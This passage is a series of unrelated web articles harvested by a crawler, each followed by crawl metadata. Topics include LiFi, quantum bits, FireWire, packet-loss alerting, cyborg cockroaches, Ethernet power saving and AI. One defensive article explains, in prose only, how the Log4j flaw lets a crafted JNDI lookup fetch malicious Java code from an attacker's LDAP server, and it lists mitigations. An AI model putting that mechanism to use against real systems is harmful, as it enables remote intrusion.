exploit IoT technologies, and it is here that energy companies should focus their efforts to supply the skills that they lack.”
<urn:uuid:cfe5a2ec-f101-4e44-82a5-906e971dd6b4>
CC-MAIN-2022-40
https://internetofbusiness.com/inmarsat-skills-gap-iot-innovation/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00277.warc.gz
en
0.954988
745
2.546875
3
In October 2020, Getac became the world’s first manufacturer to bring integrated LiFi technology to the rugged computing market. Its industry-leading UX10 fully rugged tablet integrates this capability powered by pureLiFi. The innovation marked a critical turning point in the evolution of rugged computing. This exciting new technology gives customers an entirely new way to operate and communicate with unrivaled speed, security, and reliability. This two-part blog series explores LiFi technology and how it works before discussing critical industry applications used worldwide. A powerful new way to communicate LiFi technology was first demonstrated to a captivated audience in 2011. Professor Harald Haas presented this innovation as part of a world-renowned TED Global talk in 2011. LiFi could completely revolutionize the wireless communication market from the outset, and Professor Haas established pureLiFi and co-founder Dr. Mostafa Afgani the following year. Since then, the pureLiFi team has spent much of the last decade turning that potential into commercial reality. How does LiFi work? LiFi technology harnesses the power of solid-state lighting, such as light-emitting diodes (LEDs), to transmit data without radio frequencies. LEDs are semiconductors that can be modulated at excessively high rates. These are undetectable to the human eye but can be identified and decoded by a photodetector. As a result, anywhere there are LEDs, there is the potential to have LiFi-based data transfer and communication in the future. The technology is highly versatile, working indoors, outdoors, bright sunlight, and even in low-light conditions. What’s more, LiFi can utilize the entire light spectrum, including infrared, meaning illumination isn’t even needed for operation. Security is one of the most significant advantages that LiFi technology offers over conventional WiFi solutions. WiFi data signals travel in all directions. This includes signals going through walls and ceilings. However, the unique characteristic of light means LiFi signals are much more controllable. LiFi data can be easily contained in a single room or even a defined cone of light. This makes it inherently secure. Furthermore, LiFi has virtually no electromagnetic signature, meaning nearby hackers can’t penetrate or detect networks. LiFi access points can even look like regular lights and therefore practically invisible. Of course, the benefits don’t just end with speed and security. LiFi signals also boast 3,000 times the density of WiFi signals offering an unparalleled user experience. At the same time, ultra-low latency makes LiFi ideally suited to augmented reality and virtual reality applications. A new dawn for wireless communications While LiFi technology is new, its coming impact is clear. Getac and pureLiFi are showing first-hand what they can do for businesses and their long-term data strategies. Part two of this series will explore real-life practical applications, including sectors where LiFi will significantly impact in the next few years. Stay tuned!
<urn:uuid:083989cb-cc1e-4114-991d-a9252c34dd0f>
CC-MAIN-2022-40
https://www.getac.com/us/blog/shining-a-light-on-lifi-technology/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00277.warc.gz
en
0.938616
620
2.59375
3
Comparing an atom to a coin is like comparing a human heart to a repeatedly clinching fist. The analogy is woefully simplistic in relation to what is actually going on. But someone with a layman’s understanding of the human body is unlikely to grasp the nuances of the human heart. Similarly, someone whose understanding of physics is derived from high school science class is unlikely to grasp the quantum world. So despite its shortcomings, a coin may be an apt description. Or at least the most apt description this side of the Heisenberg Uncertainty Principle. So: When someone flips a coin, it will land on either heads or tails. These are the two, and only two, possible outcomes while the coin is in the air. In that sense, a coin is akin to classical computing. Information is stored in a string of 0s and 1s (a string, that is, of heads and tails). Together, the 0s and 1s form bits, and these bits, when aligned in certain sequences, dictate the functions that a machine is to perform, be it sending a text message or opening up Microsoft Word. A Huge Little Difference Machines that use quantum technology, however, have a different type of bit. Unlike a conventional bit, a quantum bit, or “qubit,” has the physical properties of an atom. And because of atoms’ ability to be in dual states, a qubit can simultaneously be 0 and 1. So while conventional computers are governed by a rigid series of mutually exclusive 0s and 1s, a quantum computer is built with qubits that can be 0 and 1 at the same time. A qubit, in this sense, is a coin resting on its edge, capable of going either way and, as a result, performing at a higher level than conventional bits. “A coin on its side gives you the option of going either way,” said John Martinis, a physics professor at the University of California, Santa Barbara, speaking in colloquial terms about a colossal concept. “It provides a range of possibilities that usually aren’t possible,” he told TechNewsWorld. And this versatility is one of the reasons quantum technology is going open previously unopened doors — or, more accurately, build doors where doors previously didn’t exist. Dueling With Dual Nature Increased possibilities or no, a coin on its edge is nonetheless fragile, constantly in a state of wanting to topple over. Thus, while the dual possibilities of qubits unleash fantastic computational capabilities, this fragility poses a daunting challenge. “You want to extract that richness, but you don’t want to lose the stability,” Martinis said. “We need to be able to control something, to control the quantum state, but at the same time we don’t want to have other things that cause the state to change.” This quandary has mandated its own area of study, some of which is taking place some 5,500 miles away from Santa Barbara, in Denmark. That’s where Jacob Sherson, a professor and researcher at Aarhus University, is trying to perfect a type of laser, or “tweezer,” that can manipulate the movement of these otherwise fragile atoms. “The tweezer,” Sherson told TechNewsWorld, “is a tool to make atoms interact with one another. We are able to point the tweezer at a single atom and control it, make it do what we what. Now we want to do that with more and more atoms.” Owing to the fact that qubits have the physical properties of an atom — that they can simultaneously be 0 and 1 — each additional atom doubles the number of possible operations. This results in an exponential increase of the power of a quantum device. As Sherson writes, “30 quantum bits can allow a billion 10^9 operations at once, whereas a gate with 30 classical bits still does only one operation.” Current computing devices compensate for this limitation by cramming billions of transistors into a single chip, allowing for myriad functions by virtue of volume. Quantum technology wouldn’t need this volume, however, because each individual qubit is so powerful. And this, according to Mark Ketchen, the manager of physics of information at the IBM’s TJ Watson Research Center, will bring about seismic shifts in computing power. “You don’t need several billion qubits to perform functions on a quantum computer” Ketchen said. “You would only need a small number. Maybe it’d be in the hundreds or thousands, but certainly not billions. So we are creating something that is orders of magnitude less and orders of magnitude faster.”
<urn:uuid:47a0d9d5-1e87-48b8-ad1e-efa1bbf7e9e8>
CC-MAIN-2022-40
https://www.linuxinsider.com/story/quantum-computers-part-2-zeros-and-ones-both-and-neither-73665.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00277.warc.gz
en
0.931381
1,005
3.375
3
Firewire is proof that a great idea doesn’t always mean success. Richard Moss at Ars Technica runs through the rise and fall of this formidably data transfer standard. Some highlights that jumped out to me: the connector was based on the original Game Boy connector, down to the pins. The original working name of the standard was ChefCat. Sony didn’t use the name “Firewire” in Japan because they thought it made Sony sound boring. And it shows that Firewire was poised to be what USB ended up becoming, the ubiquitous data transfer protocol and port. Instead, the move from a one time $50,000 license fee to a $1 fee per Firewire port push Intel off of the standard, and all but spelled it’s doom in PCs. It’s a really interesting read and gives some love to a forgotten, but innovative, connector. Ars Technica comments: The rise and fall of FireWire—IEEE 1394, an interface standard boasting high-speed communications and isochronous real-time data transfer—is one of the most tragic tales in the history of computer technology. The standard was forged in the fires of collaboration. A joint effort from several competitors including Apple, IBM, and Sony, it was a triumph of design for the greater good. FireWire represented a unified standard across the whole industry, one serial bus to rule them all. Realized to the fullest, FireWire could replace SCSI and the unwieldy mess of ports and cables at the back of a desktop computer. Yet FireWire’s principal creator, Apple, nearly killed it before it could appear in a single device. And eventually the Cupertino company effectively did kill FireWire, just as it seemed poised to dominate the industry. The story of how FireWire came to market and ultimately fell out of favor serves today as a fine reminder that no technology, however promising, well-engineered, or well-liked, is immune to inter- and intra-company politics or to our reluctance to step outside our comfort zone.
<urn:uuid:4cf99d4d-140b-402e-8e0c-f8d3996c335d>
CC-MAIN-2022-40
https://gestaltit.com/favorites/rich/remembrances-interfaces-past-firewire/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00277.warc.gz
en
0.946922
433
2.703125
3
Originally posted on http://www.howtomeasureanything.com/forums/ on Wednesday, July 08, 2009 2:46:05 PM by I want to share an observation a V.P. made after doing the 10 pass fail questions. If one was to input 50% confidence to all the questions and randomly selected T/F they would be correct 1/2 the time the difference would be 2.5. The scoring would indicate that that person was probably overconfident. Can you help here ?. I am considering making the difference between the overall series of answers (as a decimal) and the Correct answers(as a decimal) as needing to be greater than 2.5 for someone to be probably overconfident. Thaks in advance – Hugh” Yes, that is a way to “game the system” and the simple scoring method I show would indicate the person was well calibrated (but not very informed about the topic of the questions). It is also possible to game the 90% CI questions by simply creating absurdly large ranges for 90% of the questions and ranges we know to be wrong for 10% of them. That way, they would always get 90% of the answers within their ranges. If the test-takers were, say, students, who simply wanted to appear calibrated for the purpose of a grade, then I would not be surprised if they tried to game the system this way. But we assume that most people who want to get calibrated realize they are developing a skill they will need to apply in the real world. In such cases they know they really aren’t helping themselves by doing anything other than putting their best calibrated estimates on each individual question. However, there are also ways to counter system-gaming even in situations where the test taker has no motivation whatsoever to actually learn how to apply probabilities realistically. In the next edition of How to Measure Anything I will discuss methods like the “Brier Score” which would penalize anyone who simply flipped a coin on each true/false question and answered them all as 50% confident. In a Brier Score, the test taker would have gotten a higher score if they put higher probabilities on questions they thought they had a good chance of getting right. Simply flipping a coin to answer all the questions on a T/F test and calling them each 50% confident produces a Brier score of zero. Thanks for your interest,
<urn:uuid:fc0c44ef-87de-4a56-a269-ae847c9c35f2>
CC-MAIN-2022-40
https://hubbardresearch.com/passfail-questions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00277.warc.gz
en
0.969392
514
2.6875
3
This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them. Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726. How to Manage Interface Packet Loss Thresholds Interface packet loss provides indications of link problems that shouldn’t go ignored. But then you have to decide on an alerting threshold that indicates a problem without creating too many false alerts. So, what’s there to do? Allow me to explain. Causes of Packet Loss Packet loss results in packet retransmissions that consume multiple round-trip times, leading to significantly lower application throughput, in other words, application slowness. Real-time protocols are generally more tolerant of small amounts of random packet loss. However, they don’t work well with bursts of packet loss and certainly not when the packet loss gets too high. Link and Interface Errors Link and interface errors can be due to many sources. Fiber-based networks are subject to anything that reduces the optical signal, such as dirty, high-loss connections and fibers that are pinched or stretched. Copper cabling, most often twisted pair, has its own set of failure modes, including poorly crimped connectors, cable runs close to high voltage sources, or pinched cables. Wireless networks are known for a variety of limitations that create packet loss, such as overloaded access points, radio frequency (RF) interference from non-Wi-Fi sources like microwave ovens, and poor RF signal strength. You should treat interface errors as a soft infrastructure failure—they affect applications in subtle ways. Network congestion occurs in cases where network devices (including host interfaces) run out of buffer space and must drop excess packets. The intuitive action is to increase buffering, but that negatively affects congestion control algorithms, to the point that it has a name: buffer bloat. Interface drops (sometimes called discards) aren’t necessarily a bad thing. Congestion can occur at aggregation points or where link speed changes occur. It becomes a problem when it occurs too frequently, and the packet loss causes applications to become slow. Quality of service (QoS) gets used in these cases to prioritize crucial, time-sensitive traffic flows and force packet drops of less important packets. We have successfully used QoS to prioritize business applications over less important entertainment traffic (streaming audio). A Surprisingly Low Threshold So, you want to configure your network management platform to alert you to potential sources of packet loss that impact application performance. What’s a reasonable figure to use for an alerting and reporting threshold? You would think that one percent would suffice, based on our intuition developed in other disciplines, like financial. However, that intuition is flawed when applied to networking. The transmission control protocol (TCP) is very sensitive to packet loss. Some researchers measured TCP performance at different speeds and packet loss characteristics and the result is known as the Mathis Equation. The short summary is that packet loss of more than .001% of all packets causes significant decreases in throughput. That’s a packet loss rate of one packet out of 100,000 (1 out of 10E5). That translates into a bit error rate (BER) of about 10E-10. (The figures are approximate because of differences in packet sizes). Before you say that this error threshold is too small, let’s look at it differently. How long do you think a link should run before it experiences a packet loss? Using the 10E-11 figure, a one gigabit per second (1Gbps) link would run about 10 seconds between errors, while a 10Gbps link would experience an error every second. You can use this information to determine your network management system packet loss thresholds. Network Management Thresholds Network management systems (NMS) should be collecting interface performance data from all network interfaces within the organization, including errors and drops/discards. Your selection of an alerting threshold for errors/drops/discards will depend on what error rates you are willing to tolerate for your network and what threshold setting the network management tools will support. I was recently surprised to find an NMS in which packet drop thresholds couldn’t be set smaller than one percent. In these cases, it may be better to use absolute count values as thresholds. Also, note that management systems typically count errors separately from drops/discards. Regardless of the exact threshold, you should configure the NMS to use Top-N reports (e.g., Top-10) of the interfaces with the highest number of errors and drops. You can then focus on diagnosing the interfaces that have the most impact on applications. Note that some interfaces will have errors/drops but aren’t handling much traffic. I’ve seen cases where packet loss on a link was nearly 100%, but it was for a minimal number of packets. Beware, some of these paths are likely to be backup links that will have high loads if the primary fails. It’s risky to ignore these problems. You should create synthetic loads between network devices to verify their integrity. Let’s examine an actual link error situation in which I was talking with a network engineer at a major financial services firm. The network engineering team couldn’t make network changes—that was reserved for the network operations team. Some key applications were slow, and the engineer had determined that it was due to a duplex mismatch on a router-to-router link. But because packet loss was one percent, the operations team ignored it, looking for some other cause. It took the engineer several weeks to convince the operations team to fix the problem, whereupon the applications immediately returned to the desired performance. Digital Experience and Application Performance Monitoring Packet loss monitoring and analysis gets tricky with cloud-based applications. You don’t have network management visibility into the server-side network statistics. There are two potential alternatives: - digital experience (DX) monitoring products - application performance monitoring (APM) systems DX products can include a client-based monitoring system that collects important client-side data like Wi-Fi signal strengths and packet retransmissions. Application performance monitoring products monitor application performance, frequently by performing packet captures at points between the application servers and the client endpoints. A bit of setup to identify applications and client endpoints makes it easy for these systems to detect a variety of problems, including client-side slowness, network retransmissions (due to packet loss), and slow application servers. You have a wide variety of tools to monitor for packet loss, even extending to cloud-based applications. Setting appropriate thresholds on network error and drop counters to provide you with visibility into how well your infrastructure is running.
<urn:uuid:5fa40058-2418-4de6-92cf-d73646d2e54e>
CC-MAIN-2022-40
https://www.nojitter.com/enterprise-networking/how-manage-interface-packet-loss-thresholds
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00277.warc.gz
en
0.945084
1,415
2.625
3
Try Free for One Month Find powerful insights with 300+ no-code, low code automation building blocks. What Is Data Wrangling? Organizations deal with large amounts of raw data and preparing it for analysis can be timely and costly. Wrangling alleviates that burden by transforming, cleansing, and enriching data to make it more applicable, consumable, and useful. Unlike data pre-processing or preparation, wrangling happens throughout the analysis and model-building stages of the data analytics process. Wrangling improves the quality of the data being analyzed, which means rather than waste time and resources dealing with the consequences of bad data, organizations can create accurate, meaningful analyses that allow for better solutions, decisions, and outcomes. How Data Wrangling Works Data wrangling follows five major steps: Explore, transform, cleanse, enrich, and store. The Future of Data WranglingData wrangling used to be handled by developers and IT experts with extensive knowledge of database administration and fluency in SQL, R, and Python. Analytic Process Automation (APA) has changed that, getting rid of cumbersome spreadsheets and making it easy for data scientists, data analysts, and IT experts alike to wrangle and analyze complex data. Getting Started With Data Wrangling The Alteryx APA Platform™ uses a graphical interface, so it’s easy to document, share, and scale critical data wrangling work in a way that’s auditable and repeatable. No-code, low-code modes allow users to either drag-and-drop or tackle one line of programming at a time. Users can also save their work in formats similar to a spreadsheet file or as part of a larger data model to a shared platform. - Transformation tools, including Arrange, Summarize, and Transpose - Preparation and cleansing tools, such as Formula, Filter, and Cleanse - Data enrichment tools, including Location Insights, Business Insights, and Behavior Analysis
<urn:uuid:d3bd75fe-baf2-4322-a534-262da30e7480>
CC-MAIN-2022-40
https://www.alteryx.com/glossary/data-wrangling
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00277.warc.gz
en
0.883999
409
2.609375
3
Part insect, part machine – roboroach to the rescue! Researchers say that remote-controlled cyborg insects could be used to inspect hazardous areas or monitor the environment. Ruben was a cockroach captured for scientific experiments and turned into a cyborg. Upon his eventual escape, Ruben decided to use his robotic powers for good. That was the premise of RoboRoach, a Canadian kids' show that ran for two seasons in the early 2000s. It is now also a real-life fact, apparently. A team of researchers at RIKEN institute in Japan have engineered actual roboroaches. It is unclear whether the series inspired the research at all, but these robobugs, just like Ruben, were not built to act with free will either. For cyborg insects to be practical, handlers must be able to control them remotely for long periods of time – which, according to researchers, was easier said than done. Eventually, they found a way by attaching a solar cell to a rechargeable battery that powers a wireless control module. It sits on a cockroach like a tiny backpack. "Keeping the battery adequately charged is fundamental – nobody wants a suddenly out-of-control team of cyborg cockroaches roaming around," RIKEN said and was probably not wrong. The researchers used Madagascan cockroaches for their study, which was published by npj Flexible Electronics, a scientific journal. Approximately 6cm long, they have a wider body surface to attach all the equipment needed to control their legs remotely – and turn them left or right. The study showed that despite all the mechanics they had to carry, cyborg cockroaches could still move freely thanks to ultrathin electronics and flexible materials used in the design. The rigid part of the built could be stably mounted on a cockroach's thorax for more than a month. "Considering the deformation of the thorax and abdomen during basic locomotion, a hybrid electronic system of rigid and flexible elements in the thorax and ultrasoft devices in the abdomen appears to be an effective design for cyborg cockroaches," lead researcher Kenjiro Fukuda said. Since abdominal deformation is not unique to cockroaches, the same design could be adapted to other insects, including flying ones – like cicadas. Live bugs were used for this experiment as opposed to a field of research that scientists at Rice University in Texas recently dubbed "necrobotics" after repurposing a body of a dead spider as a mechanical gripper. More from Cybernews: Subscribe to our newsletter
<urn:uuid:7b652ab3-7aba-4808-ab23-c60abe360ccd>
CC-MAIN-2022-40
https://cybernews.com/tech/cyborg-cockroaches-practical-reality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00477.warc.gz
en
0.963804
533
3.125
3
It’s no exaggeration to call the Log4j vulnerability one of the most severe cybersecurity crises in many years. A flaw in the widely popular open source Log4j software package, the Log4j CVE exposed a vast number of organizations worldwide to malware, including the mass recruitment of botnets for DDoS attacks. As a zero-day vulnerability, the Log4j CVE may already have been exploited by cyber criminals before it was first reported to the Apache Software Foundation on November 24, 2021, or announced publicly on December 10, 2021. The unprecedented extent of the zero-day Log4j vulnerability has made remediation both critical and challenging. The Log4j CVE affects hundreds of millions of devices from network servers and heavy industrial equipment to automobiles, printers, and smartphones, and popular services such as Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, and Twitter—all of which must be updated to a new version of the software to avert a Log4j exploit. First released in early 2001, Log4j is a subsystem for recording events such as error and status reports. Lightweight and easy to use, Log4j quickly became a common component of modern applications. However, the use of the Java Naming and Directory Interface (JNDI) in the package left it open to exploitation by criminals. By sending fraudulent HTTP/HTTPS requests to log an event, and including a JNDI request in its header, an attacker might trick Log4j into querying the hacker’s own LDAP server, which could then respond with directory data containing a malicious Java object. In this way, the Log4J exploit allows cyber criminals to launch remote code execution (RCE) attacks to obtain full access to the target computer. The disclosure of the zero-day Log4j CVE sparked a dramatic response by cyber criminals, from Log4j exploit testing to active attacks. Within days, an Iranian state-sponsored hacking group named Charming Kitten or APT35 launched multiple Log4j exploit attacks against Israeli government and business sites. New Log4j exploit mutations and variations proliferated quickly, and by the end of 2021, the advanced persistent threat (APT) Aquatic Panda was using Log4Shell exploit tools in an attempt to steal industrial intelligence and military secrets from universities. Meanwhile, botnets such as Mirai, Elknot, and Gafgyt were leveraging the Log4j vulnerability to compromise IoT devices including IP cameras, smart TVs, network switches, and routers. Given the widespread presence of Log4j in IoT devices, the use of the Log4j CVE to recruit botnets is particularly problematic. With patching efforts likely to drag on—or be neglected entirely—for months or years, cyber criminals will have ample opportunities to recruit vulnerable devices for crypto mining and DDoS attack platforms. Mirai, in particular, remains a perennial threat against victims of all sizes, both directly and when rented to other threat actors to launch attacks of their own. Other forms of malware have exploited the Log4j vulnerability, as well. Even before the end of 2021, the Belgian Defense Ministry discovered such an attack against its network, possibly as part of a ransomware scheme. In early January 2022, Microsoft confirmed that cyber criminals were targeting VMware Horizon server software at organizations including the UK National Health Service (NHS) to install NightSky, a newly developed ransomware strain based on the Log4j exploit. B1txor20, first identified in March 2022 by researchers at Qihoo 360’s Network Security Research Lab, deploys backdoors, SOCKS5 proxy, malware downloading, data theft, arbitrary command execution, and rootkit installing functionality. Using the Log4j exploit, the malware attacks Linux ARM, X64 CPU architecture and uses DNS tunneling to receive instructions and exfiltrate data to and from the botnet’s command and control servers. The Apache Foundation responded quickly to the disclosure of the Log4j CVE by releasing a series of updated versions, and finally publishing a completely secure release, version 2.17.1, on December 17, 2021. However, as cybersecurity professionals know all too well, the availability of a security patch does not equate to actual security. As noted by the Google Security blog soon after the vulnerability was announced, more than 35,000 Java packages were likely affected, with most affected five levels down or more. “These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first,” the company cautioned. While upgrading or disabling Log4j libraries throughout the organization—including IoT devices and employee-owned laptops and smartphones—is a daunting task, it is an absolutely essential requirement. Beyond this critical task, enterprise cybersecurity teams should also take steps to minimize the risk of a Log4j exploit. A web application firewall should be deployed and configured to filter out unauthorized sources and content, including the JNDI requests used in Log4j RCE attacks, from unknown IP addresses. Similarly, JNDI lookups can be disabled to prevent queries to a malicious LDAP server. Disabling the loading of remote Java objects can also help ensure that malicious code will not be installed into the environment. Preventing IoT and other devices from being recruited into botnets, often for use in DDoS attacks, has been a key cybersecurity priority since long before the emergence of the Log4j exploit. The Log4j vulnerability greatly increases this risk, especially given the spike in DDoS activity associated with the Ukraine-Russia conflict. Often, these attacks use methods such as DDoS amplification and reflection to multiply their impact via open NTP, LDAP, and SNMP services. In response, organizations must redouble their defenses against both botnet recruitment and DDoS attacks. This begins with securing the enterprise network, reducing the attack surface, and maintaining an inventory of internet-exposed IoT assets. Reducing the number of open NTP, LDAP, and SNMP services can thwart DDoS amplification and reflection tactics. Sluggish network performance can signal an active botnet infection and should trigger a rapid response by SecOps teams. A10 Networks offers advanced cyber security solutions to support a Zero Trust strategy to help businesses protect their networks and data. These solutions include: A10’s modern DDoS protection solution, Zero-day Automated Protection (ZAP), scrubs attack traffic quickly and effectively using multi-level adaptive mitigation policies and ML-powered ZAPR (zero-day attack pattern recognition). By monitoring more than 15 million unique DDoS weapon sources around the globe over the last six months, we’ve curated detailed insights into the origins of DDoS attacks and how to protect against DDoS attacks.Download the Free Report
<urn:uuid:edf9c689-72bd-43ea-86bc-ec3c88820f2c>
CC-MAIN-2022-40
https://www.a10networks.com/glossary/what-is-the-log4j-vulnerability-log4j-cve/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00477.warc.gz
en
0.936565
1,388
2.703125
3
The Federal Information Security Management Act (FISMA) is a federal law that requires federal agencies and state agencies administering federal programs to develop, document, and implement an information security and protection program that effectively manages risk. The main steps to achieve FISMA compliance are: - 1. Creating a comprehensive plan to maintain the safety and security of data. - 2. Designating appropriate officials to supervise and manage the plan. - 3. Performing extensive reviews of the organization’s security plan regularly. - 4. Allowing the processing of essential and relevant information before starting operations.
<urn:uuid:b7242c67-28e4-42db-953b-31414bb1dd86>
CC-MAIN-2022-40
https://www.networkdepot.com/fisma-readiness/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00477.warc.gz
en
0.834302
123
2.609375
3
With enterprises scrambling to find ways to cut energy costs, one less-obvious way may come in the form of Ethernet — that venerable, ubiquitous networking technology. While already pervasive throughout the enterprise, Ethernet is continuing its march forward with new initiatives that could mean far faster connectivity for all network users while still being “green” — with greatly reduced power requirements. “In a standard data network … you’re not worried about power savings,” Brad Booth, president of the Ethernet Alliance industry association, told InternetNews.com. “Pre-2008, we didn’t care how much power we used as long as we were able to communicate the data.” But with today’s greater focus on power savings, networking vendors are caring how much power everything uses. That’s where an innovative use of an existing Ethernet standard comes into play. As part of a student white paper challenge sponsored by the Ethernet Alliance, University of South Florida student Francisco Blanquicet came up with the concept of using the pause cycle in Ethernet to turn data flow on and off, thereby saving power. “Originally, pause flow control was set up to prevent switches from swamping end nodes,” Booth said. “If you have a server or a desktop and it can’t handle the amount of data coming into it, Ethernet can pause the flow. When that standard was written people started using it, but then found it didn’t work with certain types of traffic very effectively.” Booth described the pause flow control approach for reducing power as an interesting use of an existing technology. Since pause flow control is already part of the Ethernet standard, it can be readily implemented by The approach could result in a 10 to 15 percent reduction in power, To drive even greater power reduction for Ethernet, the backers of the networking technology are also busy undertaking a new standards effort, Energy Efficient Ethernet. The goal of Energy Efficient Ethernet is to reduce Ethernet power consumption by 50 percent or more. “One of the things they’re looking at is to actually shut down and literally, physically turn off the physical layer device for a period of time and allow the device to take the line quiet,” Booth said. “Then bring it up for a refresh every once in a while. By refreshing intermittently, it allows you to wake up quicker.” Additionally, Booth said Ethernet’s supporters also examined reducing speeds from 10-gigabit Ethernet (10GbE) to 1GbE, based on network demand — though the results proved less than promising. “What was discovered is that shifting speed actually took so long that you would notice the impact on your network and you could potentially lose packets,” he added. 10GbE itself also continues to evolve. At Interop this year, the Ethernet Alliance is demonstrating how 10GBASE-T can be transmitted over Cat6a cabling to a distance of 100 meters — nearly double the technology’s 55-meter transmission limit a year ago. While 10GbE is currently the top speed for Ethernet, the race has already begun for 40GbE and 100GbE speeds, through the IEEE High Speed Ethernet effort, an initiative that Booth said had been incubated by the Those pushes mark only some of the most visible efforts by the Ethernet Alliance, which spends much of its time between IEEE meetings to build “The big thing with the IEEE is building consensus, and the Ethernet Alliance is supporting that effort, making sure that consensus building is happening,” Booth said. He added that Ethernet Alliance member are already talking about showing 40/100 GbE equipment in 2009. With Ethernet getting greener and faster, there are still areas that may need improvement, however. “Ethernet is a prevalent technology and it still spreading its wings into areas,” Booth said. “We have to sit down and honestly say to ourselves where can we improve the technology and make it better for next generation of datacenter and the Internet in general.”
<urn:uuid:0d94c226-ac61-4742-9870-16f13eedcfd6>
CC-MAIN-2022-40
https://www.enterprisenetworkingplanet.com/guides/ethernet-getting-faster-getting-greener/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00477.warc.gz
en
0.935323
944
2.796875
3
Is AI the technology we need to save the world? It is no secret that the world is changing drastically for good and bad and we need to think outside the box to move towards building a sustainable future for ourselves. We are a part of an era wherein everything revolves around data. There is no major industry that does not perform functions using data-trained models or has not been affected by artificial intelligence solutions. This has been the case especially since the last couple of years, since the outbreak of the COVID-19 crisis, data collection and analysis is gaining a lot of importance due to the accelerated implementation and adoption of robust IoT solutions and super-fast computer processing. Artificial intelligence (AI) refers to the ability of machines to collect and interpret data and act upon it intelligently, making well-informed decisions and carrying out tasks based on these data points. AI-based solutions are truly transformative solutions, ones that will dramatically alter people’s lives in unimaginable ways. Whether we accept it or not, artificial intelligence solutions are becoming an integral part of our everyday lives. It is present everywhere, be it workplaces, homes, cars etc. AI-based solutions have the potential to influence our everyday decisions like the choice of TV shows, movies etc based on our consumption pattern. Businesses use these solutions to target ads based on consumers’ interest, search history etc. People are more connected than ever before with the help of these solutions. Whether we like it or not, AI solutions are everywhere. Can AI help with climate change? Climate change is a serious concern but it takes a high level of data analysis to forecast and predict the effects of climate change, further trying to forecast the implication of our actions to stop and adapt to it. Today, we have a huge amount of data points available but we do not have the appropriate computing power and processors to make sense of these data points to handle climate change issues. This high level of analysis is possible with the help of artificial intelligence solutions. Moreover, AI-based solutions might be the best we have to combat and adapt to the effects of climate change. AI-based solutions can analyze huge amounts of data and can forecast predictions. AI is not just helping with the issues of climate change, AI-based solutions are also helping to monitor and predict everything from glacier retreat to commercial waste management. With constant advancements and innovations, AI-based technologies will help across industries to tackle such changes. Following are some of the reasons why AI is going to change the world in the coming years: - AI is everywhere: We knowingly or unknowingly use AI-based solutions for every small daily use of activities. Using Alexa for weather reports or using facial recognition technology to unlock your phones or using credit cards etc. These day-to-day activities are underpinned by AI and data. AI is deeply embedded in our everyday lives. It is transforming industries. The impact of AI-based solutions is largely felt across industries especially post the outbreak of the global pandemic. AI systems are outperforming human experts. - AI will help us become more human: Machines are becoming more advanced and intelligent, they are able to carry out more complex tasks, making way for rising automation across industries. With this increase in automation, there are relevant concerns about the impact on human jobs. No doubt, automation will lead to change in job roles, but it will also create new job opportunities which are based on unique human capabilities of creativity and empathy. AI will make our working lives better. - AI will become more affordable: Earlier, to adopt AI-based solutions, one required expensive technology and a huge team of in-house experts, that’s no longer the case now. Like other technology solutions, AI-based solutions are readily available for organisations of all sizes. One can partner up with custom AI development companies and get access to the best solutions and experts to consult with. - AI is fuelling other tech solutions & trends: Now that we know that AI is embedded in the smallest activities of our day-to-day lives, we have come to an agreement that it is going to change the way the world operates. AI is becoming the foundation on other technology solutions and innovations. Without AI, the tech industry wouldn’t have had solutions like virtual reality, chatbots, autonomous vehicles, facial recognition, robotics etc. Any new transformative technology or breakthrough is somewhere aligned with AI’s capabilities. Empowering researchers and scientists to build a more sustainable future With the help of AI-based solutions and other advancing technologies and innovations, we are empowering researchers and scientists to build a more sustainable future for us. It is just a matter of time wherein we continue to develop new applications and solutions and deploy them across industries and tackle the challenges in various fields. There are a lot of speculations that AI might also destroy whatever we humans have built to this date. We don’t know yet whether AI will be part of the coming era of human existence or if it will end up destroying everything. What is clear is that AI-based solutions are right now making lives easier for us, and if the future could bear little resemblance to what we inhabit today, it is going to be glorious for us!
<urn:uuid:313ca59f-5b55-4003-9274-29c5c16da876>
CC-MAIN-2022-40
https://aimagazine.com/ai-strategy/ai-technology-we-need-save-world
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00477.warc.gz
en
0.944385
1,065
2.9375
3
